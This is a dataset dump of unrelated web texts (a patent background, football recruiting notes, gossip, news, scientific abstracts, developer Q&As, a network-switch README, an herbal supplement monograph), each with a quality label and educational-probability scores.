text
stringlengths 8
5.74M
| label
stringclasses 3
values | educational_prob
sequencelengths 3
3
|
|---|---|---|
The present invention relates in general to end controlled walkie/rider pallet trucks commonly used for picking stock in large warehouses and, more particularly, to a supplemental walk along control arrangement for improved operation of such pallet trucks. A typical walkie/rider pallet truck includes load carrying forks and a power unit having a steerable wheel, a steering control mechanism, a brake including a deadman brake mechanism, an electric traction motor, a storage battery and a platform onto which the operator may step and ride while controlling the truck. The steering mechanism normally has a handle mounted at the end of a movable steering arm with the handle including controls for raising and lowering the forks and rotatable twist grips or comparable devices to control the speed and direction (forward and reverse) of the truck. A switch for reversing vehicle travel direction when traveling in the power unit first or forward direction and a horn switch are also normally provided on the handle. In stock picking operations, a truck operator typically follows a winding, unidirectional route through the warehouse, picking up stock in a predetermined sequence in order to maximize productivity. The operator normally walks alongside the truck when the distance along the route between picks is short and steps onto the truck platform to ride when the distance between picks is longer, for example twenty or more feet. When the operator is riding on the truck platform, it is desirable for optimum work productivity to move the truck at higher speeds than when the operator is walking beside it. To this end, speed controllers that include high and low speed control circuits are provided. For movement of the truck, the operator grasps the handle and moves the steering arm into a truck operating range between a generally vertical (up) braking position and a generally horizontal (down) braking position. If the operator releases the handle, the deadman brake mechanism, for example comprising an arm return spring, forces the arm to the up braking position which actuates a vehicle brake, for example a spring-loaded brake, to stop the truck. The operator can also actuate the brake by bringing the steering arm to the down braking position. Thus, the walkie/rider pallet truck may be in either a braking or non-braking mode, depending on the position of the steering arm within specified braking and operating arcs. Rotation of the twist grips controls movement of the truck: rotation of either grip in one direction causes the truck to move with the power unit leading, the forward direction, while rotation in the opposite direction causes the truck to move with the load carrying forks leading, the backward or reverse direction. Increased rotation of the grip in either direction, when operated in either the walkie or the rider mode, results in an increase in the power supplied to the electric motor causing the truck to move at a higher speed in the corresponding forward or reverse direction. In addition to the motion control provided by the rotatable twist grips, rider pallet trucks may also include side or xe2x80x9cjogxe2x80x9d switches. The jog switches can be used by an operator walking alongside the truck to accelerate the truck to a walking speed of around 3.5 miles per hour (mph) (5.6 km/hr) to move from one stock pick position to the next stock pick position. A single jog switch is normally provided on each side of the handle either on an outer portion of the handle or on an inner, protected portion of the handle. An example of another jog switch arrangement, wherein a pair of switches, one on the outside of the handle and one on the inside of the handle, is provided on each side of the handle and both switches must be activated to move the truck, is illustrated in U.S. Pat. No. 5,245,144 which is entitled WALK ALONG HAND GRIP SWITCH CONTROL FOR PALLET TRUCK which issued on Sep. 14, 1995 to the assignee of the present application and is incorporated herein by reference. The efficiency of order picking is severely hampered if the brake is activated every time an operator releases the steering arm. Thus, brake override, or coasting, systems have been developed to override the deadman brake mechanism by preventing the steering arm from entering the up braking position when the operator releases the handle/steering arm while walking alongside the truck. During typical operation, an operator may use one of the jog switches to accelerate the truck to walking speed. When approaching a stopping point, the operator releases the jog switch and allows the truck to coast to a stop while the operator moves to an adjacent rack or shelf to pick up an item and place it on a pallet on the forks. The operator plans the coast of the truck so that the pallet on the forks will stop near the operator""s position at about the same time that the operator is ready to place the item onto the pallet. After loading the pick onto the truck, the operator again operates one of the jog switches and moves the truck toward the next pick location. The rate of acceleration and speed of the truck are controlled by switching a jog switch on and off. The coast distance is controlled by controlling the truck""s travel speed when the jog switch is released and of course the position of the truck relative to the pick when the jog switch is released. Generally, use of the vehicle brake is not necessary during coasting operation; however, the vehicle brake is available to the operator as needed. While coasting increases the efficiency of picking operations, after making a pick, the operator still must move from the forks to the handle to once again move the truck using either the twist grips or the jog switches. Over the course of a day""s picking operations, the operator may walk a substantial distance just to be able to once again operate the truck after such coasting/picking operations. Accordingly, there is a need for a supplemental walk along control for walkie/rider pallet trucks that would substantially reduce if not eliminate the short but numerous walks from the forks of a truck to the control handle of the truck that an operator must now make between closely spaced picks. The supplemental walk along control would be placed closely adjacent a load backrest associated with the forks so that rather than having to walk to the handle, the operator can control the truck from the vicinity of the load backrest. The operator would be able to jog the truck from pick to pick in the coast mode and could apply the brake by releasing the coast mode to enable the deadman mechanism to apply the vehicle brake. This need is met by the invention of the present application wherein supplemental walk along control for walkie/rider pallet trucks is provided by supplemental jog switches and coast release switches provided substantially adjacent to the bases of load carrying forks of the trucks. The supplemental jog switches are enabled for coasting operation of the trucks so that, for closely spaced picks located along substantially straight portions of pick routes, operators need only advance to the bases of the load carrying forks and activate the supplemental jog switches to accelerate the trucks to walking speed. If the trucks"" brakes need to be applied, the operators can activate the coast release switches to release the coast mode and enable deadman brake mechanisms to brake the trucks. A steered direction detector may be provided on each truck to determine the direction of the steered wheel of the truck. If the steered wheel is not directed substantially straight ahead, as should be the case for travel along a substantially straight portion of the pick route, then operation of the truck from the supplemental jog switch(es) may be disabled. Additional features and advantages of the invention will be apparent from the following description, the appended claims and the accompanying drawings. | Low | [
0.51008064516129,
31.625,
30.375
] |
Sunday, February 3, 2013 Scouting Report: 2014 Quarterbacks Norman (OK) North quarterback David Cornwell Much has been made in recent weeks and months about the [lack of] quarterback offers for the class of 2014. Numerous guys have been rumored to have interest in Michigan, but the offers aren't coming easy. At least three guys (David Cornwell, Michael O'Connor, and Wilton Speight) are slated to talk to the coaches this coming Wednesday, and there's a good chance that at least one of them will be offered at that time. Here I'll do a brief rundown of the guys on Michigan's radar, listed in order of my preference. Keep in mind that I'm calibrating for how well these players would fit at Michigan specifically, not necessarily their overall value as college football prospects. 1. David Cornwell - QB - Norman (OK) North: The 6'5", 235-pounder has offers from Auburn, Indiana, Tulsa, Virginia Tech, and Washington State. He's a tall guy with good pocket awareness and the ability to throw the ball with good velocity, either standing in the pocket or on the move. He's able to change arm angles and keep his eyes downfield when scrambling. Physically, he'll be ready to play early. Cornwell lacks great foot speed, but he's quick enough to keep plays alive. 2. Michael O'Connor - QB - Bradenton (FL) IMG Academy: The 6'5", 205 lb. prospect has offers from Akron, Buffalo, Michigan State, Mississippi State, South Florida, Toledo, and Vanderbilt. The first thing that jumps out about O'Connor is his running ability; he's no Denard Robinson, but he can move for a kid his size. He has a fairly strong arm, but his footwork gets sloppy at times, which I can see leading to some inaccuracy and timing issues. 3. Caleb Henderson - QB - Burke (VA) Lake Braddock:The 6'4", 223 lb. prospect has offers from Illinois, Maryland, Michigan State, North Carolina, Virginia, and Virginia Tech. He's a very heady football player. He takes care of the football, shows good footwork, stays balanced in the pocket, and is always ready to throw. Henderson doesn't have great arm strength, but he's a guy who looks like he's in control of the game. He reminds me a little bit of former Iowa quarterback Drew Tate. 4. Tyler Wiegers - QB - Detroit (MI) Country Day: The 6'4", 200 lb. prospect has offers from Central Michigan, Toledo, and Western Michigan. He has a good, strong arm and stands tall in the pocket. When he's in the pocket or on the move, he always has the ball cocked and ready to throw. He already plays in a pro-style offense, which is good, but his three-step drops in high school will turn into five- and seven-step drops in college. Wiegers is not a dynamic runner, but he's stout enough to shake off some tacklers. One concern I have about him is his lack of progressions; he has a good receiver in 2014 prospect Maurice Ways, but Wiegers tends to pre-determine where the ball is going. There are few highlights where he really scans the field and makes check-downs, which is always a problem at the higher levels. 5. Chance Stewart - QB - Sturgis (MI) Sturgis: The 6'6", 205 lb. quarterback held a Western Michigan offer before committing to Wisconsin. When I watch Stewart play, what I see is John Navarre. Stewart is a tall kid with some room to fill out. He has decent arm strength, but his throwing mechanics are a little sloppy and the ball drops down and loops a little bit, elongating his delivery. He's not a running threat and would be somewhat of a sitting duck in the pocket. I can see him fitting well in Wisconsin's offense during the Bret Bielema years, but he doesn't seem to fit Al Borges's ideal. 6. DeShone Kizer - QB - Toledo (OH) Central Catholic:The 6'4", 205 lb. quarterback has offers from Boston College, Bowling Green, Illinois, Louisville, Michigan State, Nebraska, Penn State, Syracuse, and Toledo. He's a good runner, but he's very unpolished as a quarterback. His footwork is messy, and he has a long, looping delivery like Byron Leftwich. And despite all that winding up, he doesn't have a great deal of arm strength. 7. Travis Smith - QB - Ithaca (MI) Ithaca: The 6'2", 200 lb. prospect has a lone offer from Central Michigan. There's a lot to like about this kid. He runs his offense very efficiently, seems to do a good job of making pre-snap reads, is a very accurate passer, and runs the ball well. A couple concerns I have are his size (if he lists 6'2", he's probably 6'0" or 6'1") and his arm strength. I don't think he has the ability to drop straight back and hit a receiver streaking down the sideline 50 yards away. He also runs a shotgun spread offense, which might slow the learning curve in an offense like Michigan's. 8. Wilton Speight - QB - Richmond (VA) Collegiate: The 6'6", 217-pounder has no offers at this time. Speight might be the sleeper of the group. I like the way he throws the ball under pressure. Sometimes it's unbelievable how accurate he is with guys in his face, but to be honest, it seems like he's in a habit of throwing off his back foot because of a porous offensive line. He barely has a chance to breathe before two or three defenders are in his face. He's a little too stiff in the pocket for my liking and will struggle to avoid college rushers; he lacks great arm strength and has a little bit of a hitch in his delivery. He just looks very unpolished. I could see him going somewhere like Texas Tech or Washington State and lighting it up a few years down the road, but I don't think he's a good fit for Michigan. 9. Coleman Key - QB - Broken Arrow (OK) Broken Arrow: The 6'5", 210 lb. signal caller has a lone offer from Arkansas State. He shows good touch, and his height allows him to throw over the middle with ease. He doesn't have a cannon for an arm, and he's not much of a threat to run the ball. While many elite quarterbacks start from their sophomore or even freshman year, Key's first year as the starter was as a junior in 2012, so he's not as experienced as some other quarterbacks. Perhaps because of that reason, he seems to lack a little bit of pocket awareness. I think better offers than Arkansas State will come down the road. 10. Andrew Ford - QB - Camp Hill (PA) Cedar Cliff:The 6'3", 190 lb. prospect has offers from Massachusetts and Temple. Quite simply, I think Ford lacks the arm strength to be a serious Michigan prospect. He has some other shortcomings - mediocre size, sloppy footwork, not particularly athletic - but he doesn't have enough zip to overcome those weaknesses. He's a good high school football player, but not BCS conference-caliber, in my opinion. Read an interview with Speight that he would commit if offered. Don't think he's one of the priority targets for the coaches, so he might not get an offer, but maybe he'd would, and commit for depth if they end up needing another qb. I don't really have anything new on Shane Morris. I don't think he's improved much since last summer. Strong arm, pretty good feet, decent athlete. He stares down his receivers, which is a habit he HAS to break. I think there's also going to be a little bit of a Chad Henne-like adjustment period before he realizes that he doesn't have to throw everything 100 mph. I don't think he's going to be ready as a freshman, but I've thought that all along. The longer we can keep Gardner around, the better. Okay, this has been frustrating me for a while now. I really don't think it's to Michigan's advantage to go back to statue QBs with golden arms. Do you think it's possible that a guy like Devin Gardner can change the way Borges/Hoke look at the offense? A guy who can throw the ball with accuracy but can move if needed, but also have 3-5 designed runs per game?-WillyWill9 He visited Alabama last weekend. Neither Henry or his father has made a public statement about the strength of Henry's commitment to Michigan at this point, so I'm very suspicious about whether he's fully committed. One would think that if he were 100% committed and had just taken a trip to Tuscaloosa for fun, he would have come out and said so. Surely there are numerous outlets trying to get that question answered. That being said, Alabama just flipped defensive tackle A'Shawn Robinson from Texas, so that might prevent Poggi from committing even if he wanted to do so. I will also say, however, that the Poggis are not the most outspoken people when it comes to recruiting, so they could just be staying quiet to say "F*** you people. We can do what we want, regardless of what internet recruiting stalkers think." And if that's the case, more power to them. I don't think 17-year-old kids should have to explain what cities they visit. I like Speight a lot would take him in a heartbeat. He kind of makes me think of Philip Rivers in that he's a little dorky maybe, but if you're coming after him with a lot of intent, he's got just enough swerve to make you miss. While he doesn't throw rockets, he looks to be throwing a real nice catchable ball and not only is he accurate, but he is mostly putting the ball where only his guy has any shot at it at all. Highlight reel, I know. I'd take any of the first three guys before him and if I could get two of em, I'd probably pass on Speight altogether, but I'd really like to get two this year and would be thrilled if this kid was the second one and not all that unhappy if he was the top QB in the class. I think he can play. | Low | [
0.522072936660268,
34,
31.125
] |
Well we stumbled on this little gem from sometime in June. Josh Hartnett and his lover friend Tamsin Egerton hit up Psycho Suzi’s for an evening of drinks. They specifically opted for the Leilani’s Fire Bowl, a “48 oz. of liquor-on-fire nonsense. A cadre of booze and boozosity.” Though in the photo, it looks like Tamsin – the hot blonde on the left – is enjoying it a little bit more than Mister Hartnett. TCS Calendar Latest TCS Poll Twitter Facebook Company TCStarlight is Twin Cities - Minneapolis / St Paul - and Minnesota celebrity sightings, gossip, pop culture, sports culture and a podcast to boot. Highlighted by unique insight and irreverent humor, local writers drop some knowledge on the latest happenings like Ken Jennings did on Jeopardy. Disclaimer TCS uses pictures from the internet and social media. All images we didn't capture ourselves are linked directly to their source. Text used in posts is original content based on the writers biased - and usually insensitive - opinions. We are not a news source, or not according to Google at least. | Low | [
0.44491525423728806,
26.25,
32.75
] |
While the White House lavished acting Defense Secretary Patrick Shanahan with praise upon announcing his nomination to head the department on Thursday, President Trump reportedly had reservations about the pick, Politico reported. Shanahan was invited to the White House at least twice in the past two weeks to speak with Trump. The acting secretary reportedly expected to be nominated during those meetings, but left both times without an offer. Trump even admonished him in one of the meetings for, what he sees as, the Pentagon’s lack of progress on building his border wall. The Pentagon’s been tasked with funding construction projects on the southern border ever since Trump declared a national emergency to get his pet project built. | Low | [
0.42396313364055305,
23,
31.25
] |
Generating Intrinsically Disordered Protein Conformational Ensembles from a Database of Ramachandran Space Pair Residue Probabilities Using a Markov Chain. Intrinsically disordered proteins (IDPs), involved in regulatory pathways and cell signaling, sample a range of conformations. Constructing structural ensembles of IDPs is a difficult task for both experiment and simulation. In this work, we produce potential IDP ensembles using an existing database of pair residue φ and ψ angle probabilities chosen from turn, coil, and bend parts of sequences from the Protein Data Bank. For all residue pair types, a k-means-based discretization is used to create a set of rotamers and their probabilities in this pair Ramachandran space. For a given sequence, a Markov-based probabilistic algorithm is used to create Ramachandran space database-Markov ensembles that are converted to Cartesian coordinates of the backbone atoms. From these Cartesian coordinates and φ and ψ dihedral angles of a sequence, various observables: the radius of gyration and shape parameters, the distance probability distribution that is related to the small-angle X-ray scattering intensity, atom-atom contact percentages, local structural information, NMR three-bond J couplings, CA chemical shifts, and residual dipolar couplings are evaluated. A benchmark set of ensembles for 16 residue, regular sequences is constructed and used to validate the method and to explore the implications of the database for some of the above-mentioned observables. Then, we examine a set of nonapeptides of the form EGAAXAASS where X denotes residues of different characters. These peptides were studied by NMR, and subsequent molecular dynamics (MD) simulations were carried out using various force fields to find which one best agrees with the NMR data. Our analysis of these peptides shows that the combination of the database and the Markov algorithm yields ensembles that agree very well with the NMR and MD results for the above-listed observables. Thus, this database-Markov method is a promising method to generate IDP conformational ensembles. | High | [
0.6853146853146851,
36.75,
16.875
] |
DNMT3B -579 G>T promoter polymorphism and risk of gallbladder carcinoma in North Indian population. Carcinoma of gallbladder (GBC) is a relatively rare but highly fatal disease. The DNA (cytosine-5-)-methyltransferase 3 beta (DNMT3B) -579 G>T promoter polymorphism (rs1569686) influences gene function and has been associated with various malignancies. Present population-based case-control study was undertaken to examine the potential association of DNMT3B -579 G>T variation with GBC in North Indian population. Genotypes and allelic frequencies of the DNMT3B -579 G>T polymorphism were determined for 212 GBC patients and 219 controls using PCR-RFLP. Odds ratio (OR) and 95% confidence interval (95% CI) were calculated for the association of DNMT3B polymorphism with GBC. Analysis of potential transcription factor binding sites was also identified in the region harboring the polymorphism. The DNMT3B -579 G>T polymorphism was found to be non-significantly associated with an overall increased risk of GBC (OR = 1.10 and 1.56 for T/G and G/G genotypes, respectively, P (trend) = 0.227). The increased risk was predominant in both male and female cohorts and also non-significantly in GBC patients with gallstone status (OR = 1.44; P = 0.280, OR = 1.06; P = 0.804 and OR = 1.45; P = 0.143, respectively). DNMT3B -579 G>T polymorphism may alter susceptibility to GBC although it may not play a major role in the pathoetiology of this disease in North Indian population. | Mid | [
0.647058823529411,
35.75,
19.5
] |
Smithsburg, Walkersville students win Northrop Grumman scholarships May 30, 2011 BALTIMORE — Northrop Grumman Corp. has announced the 24 winners of its ninth annual Engineering Scholars program, which will provide a total of $240,000 in college scholarships this fall to high school seniors across Maryland interested in studying engineering or STEM (science, technology, engineering and math) related fields. Suzanne Reed of Smithsburg High School and Jacob Alvarez of Walkersville (Md.) High School were among the winners from this area. The students from 23 Maryland counties and the city of Baltimore will receive merit-based scholarships of $10,000, payable in $2,500 installments over four years. The announcements were made during an awards reception and dinner hosted by Northrop Grumman at the Baltimore Museum of Industry. | High | [
0.6795180722891561,
35.25,
16.625
] |
Prakash Jarwal Prakash Jarwal is an Indian politician from the Aam Admi Party, currently representing Deoli constituency in the Delhi State Legislature. About Jarwal is the youngest candidate of Aam Aadmi Party, 25 years old. Jarwal has left his job of assistant manager in a multinational company, to join the anti-Corruption movement and later AAP. Jarwal has been jailed for an alleged assault on a Delhi Jal Board junior engineer. On 21 July 2017, Jarwal was booked for molesting and harassing a woman who was allegedly a member of the Rashtravadi Janata Party. On 20 February 2018, Jarwal was arrested for assaulting Delhi chief secretary Anshu Prakash at the residence of Chief Minister Arvind Kejriwal. He was granted bail on 9 March. References Category:Living people Category:Aam Aadmi Party politicians from Delhi Category:Delhi MLAs 2013–2015 Category:Delhi MLAs 2015–2020 Category:Delhi MLAs 2020– Category:Year of birth missing (living people) Category:Aam Aadmi Party candidates in the 2020 Delhi Legislative Assembly election | Mid | [
0.576142131979695,
28.375,
20.875
] |
Copyright (C) 2016 Accton Networks, Inc. This program is free software: you can redistribute it and/or modify It under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. To initialize the system, run "accton_as5812_54t_util.py install". To clean up the drivers & devices, run "accton_as5812_54t_util.py clean". To dump information of sensors, run "accton_as5812_54t_util.py show". To dump SFP EEPROM, run "accton_as5812_54t_util.py sff". To set fan speed, run "accton_as5812_54t_util.py set fan". To enable/disable SFP emission, run "accton_as5812_54t_util.py set sfp". To set system LEDs' color, run "accton_as5812_54t_util.py set led" For more information, run "accton_as5812_54t_util.py --help". ==================================================================== Besides applying accton_as5812_54t_util.py to access peripherals, you can access peripherals by sysfs nodes directly after the installation is run. LED controls can be found under /sys/class/leds. The sysfs interface color mappings are as follows: Brightness: 0 => off 1 => green 2 => amber 3 => red 4 => blue There are 5 system LEDs, loc, diag, fan, ps1, and ps2. They are lit automatically by CPLD, but the loc and diag. The loc led has only 1 color, blue. The diag one has 3 colors: red, amber, and green. Fan controls can be found in /sys/bus/i2c/devices/2-0066. There are 12 fans inside 6 fan modules. All fans share 1 duty setting, ranged from 0~100. Three temperature sensors are controlled by the lm75 kernel modules. They should already be visible under /sys/bus/i2c/drivers/lm75/. Two power supplies are controlled by the CPLD. Here provide their status under /sys/bus/i2c/devices/10-0050 and /sys/bus/i2c/devices/11-0053. There are 32 QSFP+ modules are equipped. Apply "accton_as5812_54t_util.py show" to get their status. Apply "accton_as5812_54t_util.py set sfp" to turn on/off light transmission. Apply "accton_as5812_54t_util.py sff" to dump EEPROM information. Before operating on that QSFP+, please make sure it is well plugged. Otherwise, operation is going to fail. | Mid | [
0.572052401746724,
32.75,
24.5
] |
Q: Gulp - does anyone know how to cache bust a js file? Gulp - does anyone know how to cache bust a js file? I'm using gulp, angular2 and html. Current gulp file with an attempt of cache busting: 'use strict'; const gulp = require('gulp'); const ts = require('gulp-typescript'); const uglify = require('gulp-uglify'); const concat = require('gulp-concat'); var htmlreplace = require('gulp-html-replace'); var addsrc = require('gulp-add-src'); var cachebust = require('gulp-cache-bust'); // See this article: http://caveofcode.com/2016/03/gulp-tasks-for-minification-and-concatenation-of-dependencies-in-angularjs/ gulp.task('app-bundle', function () { var tsProject = ts.createProject('tsconfig.json', { typescript: require('typescript'), outFile: 'app.js' }); var tsResult = gulp.src([ 'node_modules/angular2/typings/browser.d.ts', 'app/**/*.ts' ]) .pipe(ts(tsProject)); return tsResult.js.pipe(addsrc.append('config-prod.js')) .pipe(concat('app.min.js')) .pipe(uglify()) .pipe(cachebust({type: 'timestamp'})) .pipe(gulp.dest('./dist')); }); gulp.task('vendor-bundle', function() { gulp.src([ 'node_modules/es6-shim/es6-shim.min.js', 'node_modules/systemjs/dist/system-polyfills.js', 'node_modules/angular2/bundles/angular2-polyfills.js', 'node_modules/systemjs/dist/system.src.js', 'node_modules/rxjs/bundles/Rx.js', 'node_modules/angular2/bundles/angular2.dev.js', 'node_modules/angular2/bundles/http.dev.js' ]) .pipe(concat('vendors.min.js')) .pipe(uglify()) .pipe(cachebust({type: 'timestamp'})) .pipe(gulp.dest('./dist')); }); gulp.task('html-replace',[ 'app-bundle', 'vendor-bundle' ], function() { gulp.src('index.html') .pipe(htmlreplace({ 'vendor': 'vendors.min.js', 'app': 'app.min.js' })) .pipe(gulp.dest('dist')); }); A: gulp-cache-bust only appends a query string to asset references. It doesn't rename or change the assets themselves in any way. That means applying cachebust() to your .js files makes no sense. You need to apply it to the HTML that references the .js files: gulp.task('html-replace',[ 'app-bundle', 'vendor-bundle' ], function() { gulp.src('index.html') .pipe(htmlreplace({ 'vendor': 'vendors.min.js', 'app': 'app.min.js' })) .pipe(cachebust({type: 'timestamp'})) .pipe(gulp.dest('dist')); }); | Mid | [
0.560157790927021,
35.5,
27.875
] |
Scotland’s salmon industry is accustomed to blustery winds which whip off the northeast Atlantic and overhead salmon pens in lochs, bays and sounds of the nation's western and northern reaches. But the storm of a no-deal Brexit could be unlike anything it has experienced. With just 17 days to go before the UK is set to leave the EU, executives at salmon processors, salmon smokers, and salmon farmers have in recent weeks shared with Undercurrent News deep concerns about....................................................... | Mid | [
0.562899786780383,
33,
25.625
] |
Q: How can I prevent TFS from failing a PowerShell step when an error is written to the error stream? I have a PowerShell step in a TFS build that writes an error to the error stream and thus fails the build. I'd like the step to ignore the error and continue on as succeeded. Process completed with exit code 0 and had 1 error(s) written to the error stream. I've tried setting the Continue on error option in TFS, but this results in a "build partially succeeded" status, but what I want is for it to be "successful". I've also tried adding 2>&1 > output.txt to the end of the line that generates the error, but the errors are still written to the TFS output and not captured in the text file. The command I'm executing is the New-TfsChangeset cmdlet from the TFS 2015 Power Tools. A: You could uncheck the Fail on Standard Error in your PowerShell script configuration and write the lastexitcode to pass the task. Fail on Standard Error If this is true, this task will fail if any errors are written to the error pipeline, or if any data is written to the Standard Error stream. Otherwise the task will rely solely on $LASTEXITCODE and the exit code to determine failure. Then you can output the error or warning by using PowerShell or VSTS task commands. Write-Warning “warning” Write-Error “error” Write-Host " ##vso[task.logissue type=warning;]this is the warning" Write-Host " ##vso[task.logissue type=error;sourcepath=consoleapp/main.cs;linenumber=1;columnnumber=1;code=100;]this is an error " More information about the VSTS task command, you can refer to: Logging Commands A: The following script worked for me in VSTS: Write-Host "Running build script..." &$CAKE_EXE $cakeArguments 2>&1 | Write-Host I just added "2>&1 | Write-Host" to the command so that the standard error stream will be routed to the Write-Host stream. | High | [
0.6875,
31.625,
14.375
] |
Overview Information Lemon balm is a perennial herb from the mint family. The leaves, which have a mild lemon aroma, are used to make medicine. Lemon balm is used alone or as part of various multi-herb combination products. How does it work? Uses & Effectiveness? Possibly Effective for Alzheimer disease. Taking lemon balm by mouth for 4 months may reduce agitation, improve thinking, and reduce symptoms of Alzheimer disease. Lemon balm aromatherapy has also been used in people with Alzheimer disease. But there's no reliable evidence supporting a benefit of this form of lemon balm. Anxiety. Some research shows that taking a specific lemon balm product (Cyracos by Naturex SA) reduces symptoms in people with anxiety disorders. Also, early research shows that taking a product containing lemon balm plus 12 other ingredients (Klosterfrau Melissengeist by Klosterfrau) reduces anxiety symptoms such as nervousness or edginess. Cold sores (herpes labialis). Applying a lip balm containing an extract of lemon balm (LomaHerpan by Infectopharm) to cold sores seems to shorten healing time and reduce symptoms if applied at the early stages of infection. Insomnia. Taking lemon balm (Cyracos by Naturex SA) twice daily for 15 days improves sleep in people with insomnia. Taking lemon balm in combination with other ingredients also seems to improve sleep quality in people with sleeping disorders. Early research shows that taking 1-2 tablets of a specific product containing lemon balm and valerian root (Euvegal forte by Schwabe Pharmaceuticals) once or twice daily might decrease sleep problems associated with restlessness in children under age 12. It's unknown if the effect of this latter product is due to lemon balm, valerian, or the combination. Stress. Early research shows that taking a single dose of lemon balm increases calmness and alertness in adults under mental stress. Other early research shows that adding lemon balm to a food or drink reduces anxiety and improves memory and alertness during mental testing. Lemon balm also appears to reduce anxious behavior in children during dental exams. Taking lemon balm along with other ingredients at a low dose appears to reduce anxiety during psychological stress in a laboratory. But taking the combination at a higher dose appears to worsen stress-induced anxiety. Insufficient Evidence for Memory and thinking skills (cognitive function). Early research shows that taking a single dose of lemon balm improves accuracy but slows performance on a timed memory test. Other early research shows that taking lemon balm in combination with other ingredients seems to improve word recall in adults under 63 years of age. But it doesn't seem to be beneficial in older adults. Excessive crying in infants (colic). Giving certain products containing lemon balm and other ingredients to infants with colic for 1-4 weeks seems to reduce crying time. It may also increase the number of infants in whom colic resolves. The products used in research include ColiMil by Milte Italia SPA, ColiMil Plus by Milte Italia SPA, and Calma-Bebi by Bonomelli. Diseases that interfere with thinking (dementia). It's unclear if lemon balm helps reduce agitation in people with dementia. Results from research are conflicting. Depression. Early research shows that taking lemon balm with fertilized egg powder does not improve symptoms of depression compared to taking fertilized egg powder alone. Side Effects & Safety When taken by mouth: Lemon balm is LIKELY SAFE when used in food amounts. Lemon balm is POSSIBLY SAFE when taken by mouth in medicinal amounts, short-term. It's been used safely in research for up to 4 months. Side effects are generally mild and may including increased appetite, nausea, vomiting, abdominal pain, dizziness, and wheezing. Not enough is known about the safety of lemon balm when used long-term. When applied to the skin: Lemon balm is POSSIBLY SAFE for adults in medicinal amounts. It may cause skin irritation and increased cold sore symptoms. Special Precautions & Warnings: Pregnancy and breast-feeding: There isn't enough reliable information to know if lemon balm is safe to use when pregnant or breast-feeding. Stay on the safe side and avoid use. Infants and children. Lemon balm is POSSIBLY SAFE when taken appropriately by mouth for about one month. Diabetes. Lemon balm might lower blood sugar levels in people with diabetes. Watch for signs of low blood sugar (hypoglycemia) and monitor your blood sugar carefully if you have diabetes and use lemon balm. Surgery: Lemon balm might cause too much drowsiness if combined with medications used during and after surgery. Stop using lemon balm at least 2 weeks before a scheduled surgery. Thyroid disease: There is a concern that lemon balm may change thyroid function, reduce thyroid hormone levels, and interfere with thyroid hormone-replacement therapy. Avoid lemon balm if you have thyroid disease. Dosing The following doses have been studied in scientific research: ADULTS BY MOUTH: For Alzheimer disease: 60 drops per day of a standardized lemon balm extract has been used for 4 months. For anxiety: 300 mg of a standardized lemon balm extract (Cyracos by Naturex SA) taken twice daily for 15 days has been used. Also 0.23 mL/kg body weight of a combination product containing 13 ingredients including lemon balm (Klosterfrau Melissengeist, Klosterfrau) taken three times daily for 8 weeks has been used. For insomnia: 300 mg of a standardized lemon balm extract (Cyracos by Naturex SA) has been used twice daily for 15 days. Also, a specific combination product containing 80 mg of lemon balm leaf extract and 160 mg of valerian root extract (Euvegal forte, Dr. Willmar Schwabe Pharmaceuticals) has been taken 2-3 times daily for up to 30 days. Also, tablets containing 170 mg of valerian root, 50 mg of hops, 50 mg of lemon balm, and 50 mg of motherwort have been used. Three capsules containing 1000 mg of lemon balm and 400 mg of Nepeta menthoides have also been taken nightly for 4 weeks. For stress: Many different doses have been studied in scientific research. A single dose of 600 mg of lemon balm extract during a stress test has been used. Also, a single dose of 300 mg of lemon balm extract (Bluenesse by Vital Solutions) has been added to food or drink and used during a mental test. Also, three tablets of a specific product containing 80 mg of lemon balm extract and 120 mg of valerian root extract per tablet (Songha Night by Pharmaton Natural Health Products) have been taken before a stress test. Also, a specific combination product containing 90 mg of passion flower, 90 mg of valerian root, 50 mg of lemon balm, and 90 mg of butterbur per tablet (Relaxane, Max Zeller Söhne AG) has been taken as one tablet three times daily for 3 days. APPLIED TO THE SKIN: For cold sores (herpes labialis): Cream containing 1% lemon balm extract (LomaHerpan by Infectopharm) has been applied 2-4 times daily. It is usually applied at the first sign of symptoms to a few days after the cold sores have healed. CHILDREN BY MOUTH: For insomnia: 1-2 tablets of a specific combination product containing 80 mg of lemon balm leaf extract and 160 mg of valerian root extract (Euvegal forte, Dr. Willmar Schwabe Pharmaceuticals) has been taken once or twice daily in children under 12 years-old. What factors influenced or will influence your purchase? (check all that apply) Brand Name Price Online Research User Reviews Vitamins Survey Where did you or where do you plan to purchase this product? Amazon CVS Target Walgreens Walmart Health & Nutrition Specialty Store (e.g. GNC) Supermarket Other Do you buy vitamins online or instore? In-store Online What factors are most important to you? (check all that apply) Brand Name Price Online Research User Reviews This survey is being conducted by the WebMD marketing sciences department.Read MoreAll information will be used in a manner consistent with the WebMD privacy policy. Your responses will not be disclosed with any information that can personally identify you (e.g. e-mail address, name, etc.) WebMD does not endorse any specific product, service, or treatment. CONDITIONS OF USE AND IMPORTANT INFORMATION: This information is meant to supplement, not replace advice from your doctor or healthcare provider and is not meant to cover all possible uses, precautions, interactions or adverse effects. This information may not fit your specific health circumstances. Never delay or disregard seeking professional medical advice from your doctor or other qualified health care provider because of something you have read on WebMD. You should always speak with your doctor or health care professional before you start, stop, or change any prescribed part of your health care plan or treatment and to determine what course of therapy is right for you. | Mid | [
0.6437659033078881,
31.625,
17.5
] |
--- abstract: 'We consider testing the significance of a subset of covariates in a nonparametric regression. These covariates can be continuous and/or discrete. We propose a new kernel-based test that smoothes only over the covariates appearing under the null hypothesis, so that the curse of dimensionality is mitigated. The test statistic is asymptotically pivotal and the rate of which the test detects local alternatives depends only on the dimension of the covariates under the null hypothesis. We show the validity of wild bootstrap for the test. In small samples, our test is competitive compared to existing procedures.' author: - | Pascal Lavergne\ Toulouse School of Economics\ Samuel Maistre and Valentin Patilea\ Crest-Ensai & Irmar (UEB) bibliography: - 'Misspecification.bib' date: March 2014 title: | A Significance Test for Covariates\ in Nonparametric Regression --- Introduction ============ Testing the significance of covariates is common in applied regression analysis. Sound parametric inference hinges on the correct functional specification of the regression function, but the likelihood of misspecification in a parametric framework cannot be ignored, especially as applied researchers tend to choose functional forms on the basis of parsimony and tractability. Significance testing in a nonparametric framework has therefore obvious appeal as it requires much less 